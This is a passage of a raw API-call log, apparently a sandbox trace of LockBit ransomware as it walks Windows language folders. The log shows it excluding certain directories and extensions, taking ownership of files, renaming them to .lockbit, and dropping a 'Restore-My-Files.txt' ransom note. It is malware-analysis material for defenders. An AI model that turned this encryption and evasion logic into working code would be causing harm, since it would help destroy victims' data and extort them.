(lpString1="es-ES", lpString2="google") returned -1 [0079.730] lstrcmpiW (lpString1="es-ES", lpString2="application data") returned 1 [0079.730] lstrcmpiW (lpString1="es-ES", lpString2="windows") returned -1 [0079.730] lstrcmpiW (lpString1="es-ES", lpString2="windows.old") returned -1 [0079.730] lstrcmpiW (lpString1="es-ES", lpString2="appdata") returned 1 [0079.730] lstrcmpiW (lpString1="es-ES", lpString2="Windows nt") returned -1 [0079.730] lstrcmpiW (lpString1="es-ES", lpString2="Msbuild") returned -1 [0079.730] lstrcmpiW (lpString1="es-ES", lpString2="Microsoft") returned -1 [0079.730] lstrcmpiW (lpString1="es-ES", lpString2="All users") returned 1 [0079.730] lstrcmpiW (lpString1="es-ES", lpString2="mozilla") returned -1 [0079.730] wsprintfW (in: param_1=0x344d200, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES") returned 57 [0079.730] wsprintfW (in: param_1=0x344ca60, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*") returned 59 [0079.730] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\*"), fInfoLevelId=0x0, lpFindFileData=0x344cf48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344cf48) returned 0x2e3290 [0079.731] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0079.731] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 1 [0079.731] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0079.731] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0079.731] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3f3c6a2, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe41519b8, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe41519b8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0079.731] lstrcmpiW (lpString1=".", lpString2="tipresx.dll.mui") returned -1 [0079.731] lstrcmpiW (lpString1="..", lpString2="tipresx.dll.mui") returned -1 [0079.731] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0079.731] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0079.731] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0079.731] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0079.731] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0079.732] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0079.732] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0079.732] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0079.732] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0079.732] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0079.732] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0079.732] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0079.732] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0079.732] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0079.732] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0079.732] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0079.732] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0079.732] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0079.732] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0079.732] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0079.732] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0079.732] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0079.732] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0079.732] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0079.732] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0079.732] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0079.732] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0079.732] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0079.732] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0079.732] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0079.732] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0079.732] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0079.732] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0079.733] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0079.733] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0079.733] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0079.733] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0079.733] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0079.733] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0079.733] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0079.733] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0079.733] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0079.733] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0079.733] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0079.733] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0079.733] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0079.733] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0079.733] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0079.733] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="tipresx.dll.mui") returned -1 [0079.733] lstrcmpiW (lpString1="ntldr", lpString2="tipresx.dll.mui") returned -1 [0079.733] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="tipresx.dll.mui") returned -1 [0079.733] lstrcmpiW (lpString1="bootsect.bak", lpString2="tipresx.dll.mui") returned -1 [0079.733] lstrcmpiW (lpString1="autorun.inf", lpString2="tipresx.dll.mui") returned -1 [0079.733] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\") returned="" [0079.733] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui") returned=".mui" [0079.733] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0079.733] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0079.733] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0079.733] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0079.734] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0079.734] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0079.734] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0079.734] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0079.734] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0079.734] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0079.734] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0079.734] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0079.734] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0079.734] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0079.734] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0079.734] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0079.734] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0079.734] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0079.734] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0079.734] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0079.734] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0079.734] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0079.734] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0079.734] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0079.734] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0079.734] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0079.734] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0079.734] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0079.734] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui.lockbit") returned 81 [0079.735] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0079.735] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui.lockbit")) returned 0 [0079.735] GetLastError () returned 0x5 [0079.735] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0079.735] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0079.735] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.735] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0079.736] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0079.736] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3b0, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0079.736] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0079.736] NtQueryInformationFile (in: FileHandle=0x3b0, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0079.748] NtClose (Handle=0x3b0) returned 0x0 [0079.748] RtlFreeAnsiString (AnsiString="\\") [0079.748] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3b0) returned 1 [0079.748] malloc (_Size=0x200) returned 0x53fcc0 [0079.748] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0079.748] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0079.748] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0079.748] CloseHandle (hObject=0x3b0) returned 1 [0079.748] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0079.749] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0079.749] free (_Block=0x53fcc0) [0079.749] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0079.749] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui.lockbit")) returned 1 [0079.750] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0079.750] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0079.750] malloc (_Size=0x40068) returned 0x20abae0 [0079.752] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x20abaf8 | out: lpFileSize=0x20abaf8*=4096) returned 1 [0079.752] ReadFile (in: hFile=0x3b0, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0079.758] GetLastError () returned 0x3e5 [0079.758] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES") returned 1 [0079.758] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\Restore-My-Files.txt") returned 78 [0079.758] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0079.758] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0079.758] malloc (_Size=0x40068) returned 0x206b860 [0079.758] WriteFile (in: hFile=0x3c0, lpBuffer=0x2064f58, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x2064f58, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 0x0 [0079.760] GetLastError () returned 0x3e5 [0079.760] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3f3c6a2, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe41519b8, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe41519b8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0079.760] GetLastError () returned 0x12 [0079.760] FindClose (in: hFindFile=0x2e3290 | out: hFindFile=0x2e3290) returned 1 [0079.760] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="et-EE", cAlternateFileName="")) returned 1 [0079.760] lstrcmpiW (lpString1=".", lpString2="et-EE") returned -1 [0079.760] lstrcmpiW (lpString1="..", lpString2="et-EE") returned -1 [0079.760] lstrcmpiW (lpString1="et-EE", lpString2="$windows.~bt") returned 1 [0079.760] lstrcmpiW (lpString1="et-EE", lpString2="intel") returned -1 [0079.760] lstrcmpiW (lpString1="et-EE", lpString2="msocache") returned -1 [0079.760] lstrcmpiW (lpString1="et-EE", lpString2="$recycle.bin") returned 1 [0079.760] lstrcmpiW (lpString1="et-EE", lpString2="$windows.~ws") returned 1 [0079.760] lstrcmpiW (lpString1="et-EE", lpString2="tor browser") returned -1 [0079.761] lstrcmpiW (lpString1="et-EE", lpString2="boot") returned 1 [0079.761] lstrcmpiW (lpString1="et-EE", lpString2="system volume information") returned -1 [0079.761] lstrcmpiW (lpString1="et-EE", lpString2="perflogs") returned -1 [0079.761] lstrcmpiW (lpString1="et-EE", lpString2="google") returned -1 [0079.761] lstrcmpiW (lpString1="et-EE", lpString2="application data") returned 1 [0079.761] lstrcmpiW (lpString1="et-EE", lpString2="windows") returned -1 [0079.761] lstrcmpiW (lpString1="et-EE", lpString2="windows.old") returned -1 [0079.761] lstrcmpiW (lpString1="et-EE", lpString2="appdata") returned 1 [0079.761] lstrcmpiW (lpString1="et-EE", lpString2="Windows nt") returned -1 [0079.761] lstrcmpiW (lpString1="et-EE", lpString2="Msbuild") returned -1 [0079.761] lstrcmpiW (lpString1="et-EE", lpString2="Microsoft") returned -1 [0079.761] lstrcmpiW (lpString1="et-EE", lpString2="All users") returned 1 [0079.761] lstrcmpiW (lpString1="et-EE", lpString2="mozilla") returned -1 [0079.761] wsprintfW (in: param_1=0x344d200, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE") returned 57 [0079.761] wsprintfW (in: param_1=0x344ca60, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*") returned 59 [0079.761] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\*"), fInfoLevelId=0x0, lpFindFileData=0x344cf48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344cf48) returned 0x2e3290 [0079.762] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0079.762] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 1 [0079.762] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0079.762] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0079.762] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb4e9cfd, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xeb74b2cd, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xeb74b2cd, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0079.762] lstrcmpiW (lpString1=".", lpString2="tipresx.dll.mui") returned -1 [0079.762] lstrcmpiW (lpString1="..", lpString2="tipresx.dll.mui") returned -1 [0079.762] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0079.762] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0079.762] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0079.762] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0079.763] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0079.763] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0079.763] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0079.763] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0079.763] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0079.763] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0079.763] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0079.763] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0079.763] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0079.763] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0079.763] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0079.763] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0079.763] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0079.763] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0079.763] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0079.763] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0079.763] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0079.763] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0079.763] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0079.763] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0079.763] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0079.763] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0079.763] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0079.763] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0079.763] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0079.764] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0079.764] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0079.764] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0079.764] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0079.764] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0079.764] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0079.764] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0079.764] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0079.764] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0079.764] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0079.764] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0079.764] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0079.764] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0079.764] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0079.764] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0079.764] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0079.764] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0079.764] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0079.764] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0079.764] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="tipresx.dll.mui") returned -1 [0079.764] lstrcmpiW (lpString1="ntldr", lpString2="tipresx.dll.mui") returned -1 [0079.764] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="tipresx.dll.mui") returned -1 [0079.765] lstrcmpiW (lpString1="bootsect.bak", lpString2="tipresx.dll.mui") returned -1 [0079.765] lstrcmpiW (lpString1="autorun.inf", lpString2="tipresx.dll.mui") returned -1 [0079.765] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\") returned="" [0079.765] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui") returned=".mui" [0079.765] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0079.765] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0079.765] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0079.765] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0079.765] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0079.765] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0079.765] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0079.765] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0079.765] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0079.765] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0079.765] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0079.765] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0079.765] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0079.765] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0079.765] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0079.765] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0079.765] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0079.765] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0079.765] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0079.765] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0079.766] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0079.766] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0079.766] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0079.766] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0079.766] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0079.766] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0079.766] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0079.766] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0079.766] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui.lockbit") returned 81 [0079.766] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0079.766] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\tipresx.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft 